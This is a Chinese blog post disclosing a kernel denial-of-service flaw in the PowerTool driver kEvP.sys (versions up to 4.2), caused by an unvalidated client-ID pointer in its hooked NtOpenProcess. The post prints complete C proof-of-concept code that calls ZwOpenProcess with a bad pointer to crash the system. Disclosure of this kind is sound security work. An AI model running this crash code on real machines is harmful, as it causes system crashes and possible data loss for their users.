PowerTool kEvP.sys<=V4.2 内核拒绝服务漏洞

百度百科:

PowerTool 一款免费强大的进程管理器,支持进程强制结束,可以Unlock占用文件的进程,查看文件/文件夹被占用的情况,内核模块和驱动的查看和管理,进程模块的内存的dump等功能。最新版还支持上传文件在线扫描病毒。支持离线的启动项和服务的检测和删除,新增注册表和服务的强删功能,可在PE系统下清除感染MBR的病毒(如鬼影等),通过Windows7 SP1的测试。 

 --------------------------------------------------------------------------------------------------------------


其在加载的时候,为了让不让恶意软件结束自身,而SSDT Hook了NtOpenProcess函数。但是未对Ring3传过来的参数做任何校验就直接使用了,因此,触发漏洞。

示例函数:FakeNtOpenProcess

偏移:ED70

IDA汇编代码如下:

PowerTool kEvP.sys<=V4.2 内核拒绝服务漏洞_第1张图片

正如上面的汇编代码所示,只要CID参数不为空,他就直接调用了PsLookupProcessByProcessId函数。

 

而PsLookupProcessByProcessId是内核函数,其自身不会对参数有任何校验:

PowerTool kEvP.sys<=V4.2 内核拒绝服务漏洞_第2张图片


测试代码:

/*
    作者:莫灰灰
    博客:http://blog.csdn.net/hu3167343
    描述:PowerTool内核拒绝服务漏洞测试程序
*/

#include "stdafx.h"
#include <windows.h>

int _tmain(int argc, _TCHAR* argv[])
{
    HMODULE hMod = LoadLibrary(L"ntdll.dll");
    if (hMod)
    {
        PVOID p = GetProcAddress(hMod, "ZwOpenProcess");
        if (p)
        {
            printf("Your System Will Crash, See you nala.\n");

            __asm{
                push 0x80000000
                push 0
                push 0
                push 0
                call p
            }
        }
    }

    system("pause");
    return 0;
}
Ps:在开启PowerTool自保护的情况下运行上面程序,系统会蓝屏重启。正常机器木有问题。     


你可能感兴趣的:(windows,汇编,测试,System,Crash,hook)